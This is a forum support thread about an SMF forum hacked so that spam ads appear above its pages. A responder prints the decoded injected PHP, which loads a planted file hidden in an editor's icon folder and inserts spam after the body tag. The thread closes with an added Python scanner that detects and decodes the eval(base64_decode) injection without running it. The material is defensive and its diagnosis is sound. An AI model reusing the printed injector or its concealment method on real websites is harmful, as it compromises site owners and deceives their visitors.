Another Spam Question

Started by rake60, November 18, 2008, 06:21:48 PM


Something got to us.
It adds index.php to the index page address and a full page of
spam ads appear above our page.  Scroll down far enough and our stuff is there.
It only happens when we are logged in.  It also has wiped out the avatars.

How do I fix that?
The url is [nonactive]
Any help would be greatly appreciated.


Hey, wow, I'm working another topic today that is EXACTLY THE SAME!!! When I say "exactly" I mean the exact same tons and tons of advertising right after your <body> tag in your HTML. Use View -> Source in your browser to see it.

Please attach your index.template.php file to your reply.

Also, look in your root directory and tell me if you have a file called display.php. Note that this is NOT SMF's file Display.php in Sources, nor is it Display.template.php in your Themes path. It is a file "display.php" with all lower case. I'll bet you dollars to donuts that you have the exact same infection.

By the way, your forum subject is way, way cool! :)


Thanks for the comment.

I am not seeing a display.php file, but to be very honest I'm not all that sure of what I'm doing here.
Our webmaster has fallen ill, and I am more or less blind in the dark.


I got sick yesterday afternoon and still sick today, too ill to work support. I've contacted the SMF Support Team and I've requested that they send a team member over to this topic to continue support. I'll return when I get better, probably tomorrow. Good luck!

p.s. I had a quick look and apparently I was wrong. As I said, I'm sending some help to take over this topic.


Is anyone looking at or working on this issue?


The issue is in your BoardIndex.template.php file. And what's interesting is the difference between this:
and this:

Perhaps, attach your BoardIndex.template.php file?
Always be a little kinder than necessary.
- James M. Barrie


Thank you!  I'll look into that.


I posted this in another topic as well. Check the index.php file in the root of your smf folder. There may be an include(filenamehere.php/html) in that file that is calling the ad.
IchBin™        TinyPortal


IchBin, thank you!  Once this is rectified, I will outline the issues found.


Deprecated, I am one of the admins at the HMEM site working with rake60 on the issue.  We have found a string of code on the index.php file that is suspect (public folder), and have also seen the same on the boardindex and display files in the themes folder.  It is at the top of code.  Sample of what we are seeing: <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zd.......

There are many other php files with the same code string on them.  Not sure if this is the hack or not, but it sure looks suspicious.

Your help is appreciated!


Yes, it's a hack, and the eval and base64 convert it to code to execute a function:

    if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
      $GLOBALS['sh_no']=1;
      if(file_exists('/home/jhomemod/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){
        include_once('/home/jhomemod/public_html/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php');
        if(function_exists('gml')&&!function_exists('dgobh')){
          if(!function_exists('gzdecode')){
            function gzdecode($R20FD65E9C7406034FADC682F06732868){
              $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
              $R60169CD1C47B7A7A85AB44F884635E41=10;
              $R0D54236DA20594EC13FC81B209733931=0;
              if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){
                $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
                $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
                $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
              }
              if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){
                $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
              }
              if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){
                $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
              }
              if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){
                $R60169CD1C47B7A7A85AB44F884635E41+=2;
              }
              $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
              if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){
                $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
              }
              return $RC4A5B5E310ED4C323E04D72AFAE39F53;
            }
          }
          function dgobh($RDA3E61414E50AEE968132F03D265E0CF){
            Header('Content-Encoding: none');
            $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
            if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){
              return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
            }else{
              return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
            }
          }
          ob_start('dgobh');
        }
      }
    }

It looks like an exploit from another third-party script you're running on the same host, as it points to a WYSIWYG editor folder.
Is jhomemod your account name?

Looks like your server has been compromised; look for rogue files like the one it links to, as well as in any Attachment/Avatar folders of your forum.
"An important reward for a job well done is a personal sense of worthwhile achievement."
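
One way to triage the infection described in this thread, as an added example that is not from the original posts or from SMF: a read-only Python scan that lists PHP files carrying the `eval(base64_decode(` prefix, decodes each payload without running it to recover the paths it includes, and flags PHP files sitting in upload folders. The folder names in `UPLOAD_DIRS`, the `index.php` allowance and the sample tree built by `demo()` are assumptions constructed for illustration.

```python
import base64, os, re, tempfile

# Injected prefix as quoted in the thread: <? /**/eval(base64_decode('...
INJECT_RE = re.compile(
    rb"<\?(?:php)?\s*(?:/\*.*?\*/)?\s*eval\(\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'", re.S)
# File paths the decoded stub hands to include()/include_once()
INCLUDE_RE = re.compile(rb"include(?:_once)?\(\s*'([^']+)'")
UPLOAD_DIRS = {"attachments", "avatars"}  # assumption: upload folder names

def scan(root):
    """Walk a web root; decode payloads for inspection only, never execute them."""
    infected, included, rogue = [], set(), []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            parents = {p.lower() for p in rel.split("/")[:-1]}
            # assumption: only a placeholder index.php belongs in upload folders
            if parents & UPLOAD_DIRS and name.lower() != "index.php":
                rogue.append(rel)
            with open(path, "rb") as fh:
                match = INJECT_RE.search(fh.read(1 << 20))
            if not match:
                continue
            infected.append(rel)
            try:
                decoded = base64.b64decode(match.group(1))
            except ValueError:      # truncated or damaged payload
                continue
            included.update(p.decode("latin-1") for p in INCLUDE_RE.findall(decoded))
    return sorted(infected), sorted(included), sorted(rogue)

def demo():
    """Build a constructed forum tree in a temp dir and scan it."""
    stub = b"if(function_exists('ob_start')){include_once('/home/example/icons/placeholder.php');}"
    bad = b"<? /**/eval(base64_decode('" + base64.b64encode(stub) + b"')); ?><?php // original code"
    tree = {"index.php": bad, "Themes/default/BoardIndex.template.php": bad,
            "Sources/Load.php": b"<?php // clean file", "avatars/index.php": b"<?php // placeholder",
            "avatars/photo.php": b"<?php // constructed rogue upload"}
    with tempfile.TemporaryDirectory() as root:
        for rel, data in tree.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        return scan(root)
```

Run `scan()` against a copy of the site or with a read-only account; the included paths it reports are the files to inspect next, and every infected file should be restored from a known-good SMF package rather than hand-edited.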
